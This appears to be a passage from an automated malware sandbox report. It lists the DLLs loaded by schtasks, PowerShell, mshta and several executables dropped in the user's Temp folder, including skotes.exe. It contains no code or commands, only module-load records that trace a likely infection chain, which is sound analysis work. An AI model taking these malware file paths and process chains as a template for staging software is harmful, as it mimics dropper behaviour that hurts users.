                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                                Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: webio.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: dpapi.dll
